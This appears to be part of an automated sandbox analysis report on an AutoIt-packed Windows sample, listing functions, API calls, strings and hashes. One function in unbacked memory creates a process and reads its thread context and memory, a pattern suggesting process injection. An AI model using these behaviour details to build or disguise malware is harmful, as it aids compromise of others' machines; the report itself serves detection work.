Opcode Fuzzy Hash: 4f630cd48d9897f704df224e3f07943aa83cf1902737f0a8cb106d8d7cafc3ef
Instruction Fuzzy Hash: D5F030706002987EEF301717AC09E373E7EDBC7F60B01802AF900E21B0C5A55810EA70

Function 01712410 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 161
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 01712300: Sleep.KERNELBASE(000001F4), ref: 01712311

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01712579

Strings

FA25CQJKP8I6RE83JQ7962JQL, xrefs: 017125DF, 017125E2

Memory Dump Source

Source File: 00000000.00000002.1658953841.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1710000_7F7R8soxHM.jbxd

Similarity

API ID: CreateFileSleep
String ID: FA25CQJKP8I6RE83JQ7962JQL
API String ID: 2694422964-3963497545
Opcode ID: d84c5b14d7f60213af0bc3639faddc2543ead83fce9935419f8d0ca85afd47f3
Instruction ID: 4410236feced41e74fe8cfa2573a0b11bdc0e03c6ab268ee756c6ca9b53ca96e
Opcode Fuzzy Hash: d84c5b14d7f60213af0bc3639faddc2543ead83fce9935419f8d0ca85afd47f3
Instruction Fuzzy Hash: 29618430D04248DAEF11DBA8C854BEEFB75AF19304F104199E649BB2C1D6BA4B45CBA6

Function 00E7410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00EAD5EC

Part of subcall function 00E77D2C: _memmove.LIBCMT ref: 00E77D66

_memset.LIBCMT ref: 00E7418D
_wcscpy.LIBCMT ref: 00E741E1
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E741F1

Strings

Line: , xrefs: 00EAD615

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: 9150675c17b891a00a2b00394d08dbc61a8d44d5332bcd66a824afb48d842b74
Instruction ID: a209671f517f8739eca9c109f65f010f0a7bf23ac379cb33444d633033ac2354
Opcode Fuzzy Hash: 9150675c17b891a00a2b00394d08dbc61a8d44d5332bcd66a824afb48d842b74
Instruction Fuzzy Hash: 6231D171409304AADB22EB60EC46BDB77E8AF49314F10D51EF1D9B20E1EB74A648C793

Function 00E9564D Relevance: 7.7, APIs: 5, Instructions: 163
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00E956AB
_memcpy_s.LIBCMT ref: 00E9571D
__read_nolock.LIBCMT ref: 00E9577B
__filbuf.LIBCMT ref: 00E9579E
_memset.LIBCMT ref: 00E957E2

Part of subcall function 00E98D68: __getptd_noexit.LIBCMT ref: 00E98D68

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
Instruction ID: f1b9c21b29e748ae59e0631ed1cb12cbfcc18e049ad432ebebe53aa9933e7566
Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
Instruction Fuzzy Hash: EA51B332A00B05DBDF268FB9C8846AE77B5AF41324F64972EF825B62D1D7709E518B40

Function 00E769CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00E74F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00F362F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E74F6F

_free.LIBCMT ref: 00EAE68C
_free.LIBCMT ref: 00EAE6D3

Part of subcall function 00E76BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E76D0D

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00EAE462
Bad directive syntax error, xrefs: 00EAE6BB

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: e1ad0b9f50d75254aa36c96e23e137f575a196c41ddb4fa2f0d903b6f6e36213
Instruction ID: 65e2691ba1eb1b637827e73e4da613e5de256d268d6d78f8e86b531030bf98b4
Opcode Fuzzy Hash: e1ad0b9f50d75254aa36c96e23e137f575a196c41ddb4fa2f0d903b6f6e36213
Instruction Fuzzy Hash: 9C915F71A10219AFCF04EFA4C8919EDB7F4FF19314F14A46AF815BB291EB31A905CB60

Function 00E735B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00E735A1,SwapMouseButtons,00000004,?), ref: 00E735D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00E735A1,SwapMouseButtons,00000004,?,?,?,?,00E72754), ref: 00E735F5
RegCloseKey.KERNELBASE(00000000,?,?,00E735A1,SwapMouseButtons,00000004,?,?,?,?,00E72754), ref: 00E73617

Strings

Control Panel\Mouse, xrefs: 00E735D2

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 7fe7090c547cd38f7ebbde8c767f35deeff099f94af8abca8c003ebc4bb5c2d0
Instruction ID: ce37d46f2f558ec3cb82ae9276af5ed391c3f23f2a73bded6d88e5f28e311d81
Opcode Fuzzy Hash: 7fe7090c547cd38f7ebbde8c767f35deeff099f94af8abca8c003ebc4bb5c2d0
Instruction Fuzzy Hash: BE114871511218BFDB20CFA5DC40DFEB7B8EF44744F1094A9E809E7210E6719E44A760

Function 01711300 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 01711B2D
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01711B51
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01711B73

Memory Dump Source

Source File: 00000000.00000002.1658953841.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1710000_7F7R8soxHM.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 3007ae169ef8b9d8c61beb8ea063371979b6b354134e23f449e077085ff78b4f
Instruction ID: 86bf625ef1918044931823985b7e9527ef8bdf9902a4b2d2a2acbba215dc1586
Opcode Fuzzy Hash: 3007ae169ef8b9d8c61beb8ea063371979b6b354134e23f449e077085ff78b4f
Instruction Fuzzy Hash: 93620930A14258DBEB24CFA8C840BDEB776EF58300F5091A9D20DEB394E7759E85CB59

Function 00E9493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E949D0
__flush.LIBCMT ref: 00E949F0
__write.LIBCMT ref: 00E94A23
__flsbuf.LIBCMT ref: 00E94A51

Part of subcall function 00E98D68: __getptd_noexit.LIBCMT ref: 00E98D68

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
Instruction ID: 3f6cac453099906a3919d695f42c9aca0de200aa7605659fdad44d18d272c154
Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
Instruction Fuzzy Hash: 0E41D6B0A006069BDF28CE69C880DAF77A5EF84364B24A17DE855E76D0E7B09D428744

Function 00E773E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00EAEE62
GetOpenFileNameW.COMDLG32(?), ref: 00EAEEAC

Part of subcall function 00E748AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E748A1,?,?,00E737C0,?), ref: 00E748CE

Part of subcall function 00E909D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00E909F4

Strings

X, xrefs: 00EAEE7A

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: d0c02f33132e4088d6164fdc1bf2d107aeb86ac62574f04b8cf37db03e96f0b2
Instruction ID: 51987417e392977333876d3efedd8b7e1782d45b5b5d497c36a25ad85b33d819
Opcode Fuzzy Hash: d0c02f33132e4088d6164fdc1bf2d107aeb86ac62574f04b8cf37db03e96f0b2
Instruction Fuzzy Hash: CE21C070A042989BCF51DF94D845BEE7BF89F49314F00805AE508FB282DBF859898BA1

Function 00ED901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00ED9036
__fread_nolock.LIBCMT ref: 00ED904B

Strings

EA06, xrefs: 00ED907D

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: fc43cc2337615227d39750956cb4a0b193d89d4df2b177ad52e3b4c59ccf53bb
Instruction ID: 3a7350137429ebed2aa65b9b4f1f7550f88e8a538b3d116c00e33630f62b4fc8
Opcode Fuzzy Hash: fc43cc2337615227d39750956cb4a0b193d89d4df2b177ad52e3b4c59ccf53bb
Instruction Fuzzy Hash: AE01F9728042586EDF29C6A8DC16EEE7BFCDB01301F00419BF552E2181E5B5E6048B60

Function 00ED9B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00ED9B82
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00ED9B99

Strings

aut, xrefs: 00ED9B93

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 7377799282e648ee3b97351ea58e8096d766caa4f5a07cf1b8456207a172e318
Instruction ID: 1c36f95b4490c169c795af3b608a84f6bcda3c46b875cd1e5bb7c2f693d5d7de
Opcode Fuzzy Hash: 7377799282e648ee3b97351ea58e8096d766caa4f5a07cf1b8456207a172e318
Instruction Fuzzy Hash: 45D05B7554030DAFDB10DB94DC0DFA6772CEB44701F0041A1FE54D11B1DDB09598CB91

Function 00EECDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f0417905c7ef22f8b99ef4b2d1485259e5c5a37785a7c9cdbb5b0d24cb0b5d2
Instruction ID: 603e60de9655a59847c5dea68de5136e313ab3308a1d2b86c05a68a0cd6abd52
Opcode Fuzzy Hash: 4f0417905c7ef22f8b99ef4b2d1485259e5c5a37785a7c9cdbb5b0d24cb0b5d2
Instruction Fuzzy Hash: 23F15B715083459FC714DF29C880A6ABBE5FF88314F14992EF899AB352D731E946CF82

Function 00E7F8CF Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON

Download Yara Rule

APIs

Part of subcall function 00E903A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E903D3
Part of subcall function 00E903A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00E903DB
Part of subcall function 00E903A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E903E6
Part of subcall function 00E903A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E903F1
Part of subcall function 00E903A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00E903F9
Part of subcall function 00E903A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00E90401

Part of subcall function 00E86259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00E7FA90), ref: 00E862B4

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00E7FB2D
OleInitialize.OLE32(00000000), ref: 00E7FBAA
CloseHandle.KERNEL32(00000000), ref: 00EB49F2

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: 6dd382ae33ca4c212a65e16fd66a3ab2febb285d7e7a4e8fd1cd2120bfa34179
Instruction ID: 7e0afae64bde6b127f8b4022bbdc2f0a27f3bd36dce697a08c6d00cef624cc28
Opcode Fuzzy Hash: 6dd382ae33ca4c212a65e16fd66a3ab2febb285d7e7a4e8fd1cd2120bfa34179
Instruction Fuzzy Hash: D181B8B0D05248EEC784EF2AE9416657BE6FB99338750D13AE419DB362EB318405EF60

Function 00E743DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E74401
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E744A6
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E744C3

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: 9c6486934dec2357874c7e4fee24d48f29720651c6833707a9c051d1c4a98ef1
Instruction ID: 1917528aba760e2f02fd0fc493a13c0a00476ace689a94f2e07a438dce167d3a
Opcode Fuzzy Hash: 9c6486934dec2357874c7e4fee24d48f29720651c6833707a9c051d1c4a98ef1
Instruction Fuzzy Hash: 533180B05043019FD720DF24D884697BBE8FB49318F00492EE5AAE3291E771A948DB52

Function 00E9594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00E95963

Part of subcall function 00E9A3AB: __NMSG_WRITE.LIBCMT ref: 00E9A3D2
Part of subcall function 00E9A3AB: __NMSG_WRITE.LIBCMT ref: 00E9A3DC

__NMSG_WRITE.LIBCMT ref: 00E9596A

Part of subcall function 00E9A408: GetModuleFileNameW.KERNEL32(00000000,00F343BA,00000104,?,00000001,00000000), ref: 00E9A49A
Part of subcall function 00E9A408: ___crtMessageBoxW.LIBCMT ref: 00E9A548

Part of subcall function 00E932DF: ___crtCorExitProcess.LIBCMT ref: 00E932E5
Part of subcall function 00E932DF: ExitProcess.KERNEL32 ref: 00E932EE

Part of subcall function 00E98D68: __getptd_noexit.LIBCMT ref: 00E98D68

RtlAllocateHeap.NTDLL(01760000,00000000,00000001,00000000,?,?,?,00E91013,?), ref: 00E9598F

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: d379c5f61122d71b7cadb353deeb2f91a8cf9d1bf4c7335a5f97723001215478
Instruction ID: 7accaab88438d093b54602028f8737ff655c65e42b1c16264371e583a97149f3
Opcode Fuzzy Hash: d379c5f61122d71b7cadb353deeb2f91a8cf9d1bf4c7335a5f97723001215478
Instruction Fuzzy Hash: EE01D233201B15EEFE222B34D842AAE72D98F82738F10202AF525BA191DA70AD018760

Function 00ED9B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00ED97D2,?,?,?,?,?,00000004), ref: 00ED9B45
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00ED97D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00ED9B5B
CloseHandle.KERNEL32(00000000,?,00ED97D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00ED9B62

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: a529806bd31b6128cffc9cade133ff683893a4424344b3976720c0daac2d4e24
Instruction ID: 63757f258bacbf4560186655e8884c0c986bde67e84c6ac61fed79335e045e84
Opcode Fuzzy Hash: a529806bd31b6128cffc9cade133ff683893a4424344b3976720c0daac2d4e24
Instruction Fuzzy Hash: 25E02632181214BBD7211F51EC09FDE3B18EF45761F104220FB14780E083B12521C788

Function 00ED8F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00ED8FA5

Part of subcall function 00E92F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00E99C64), ref: 00E92FA9
Part of subcall function 00E92F95: GetLastError.KERNEL32(00000000,?,00E99C64), ref: 00E92FBB

_free.LIBCMT ref: 00ED8FB6
_free.LIBCMT ref: 00ED8FC8

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7d3b2028e624efae88516297b2f19128b0b5a47fb3bf7ffb404a5919715f4e12
Instruction ID: 6420fe5f7e47bf3503cd94f2d5be047e4d65173d7304b4c8e8cee454473fd42d
Opcode Fuzzy Hash: 7d3b2028e624efae88516297b2f19128b0b5a47fb3bf7ffb404a5919715f4e12
Instruction Fuzzy Hash: 64E012B17097056ACE24A778AE40A9367EF9F48354B18281EB509FB242DE24F8428124

Function 00E7AB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 00EB002B

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 5977614ca29219252dd6d5099d15053ab899f94895d59b265e74cb589bb885d0
Instruction ID: c61c4ec44b79115a8db56c5ae2e9eec0ba0b5860b55960a5c56e4ffc8c155dd1
Opcode Fuzzy Hash: 5977614ca29219252dd6d5099d15053ab899f94895d59b265e74cb589bb885d0
Instruction Fuzzy Hash: D8224870508341DFCB24DF14C490B6ABBE1FF84304F18996DE99AAB262D731ED85DB82

Function 00E74DD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E74E1A

Strings

EA06, xrefs: 00EADCF5

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
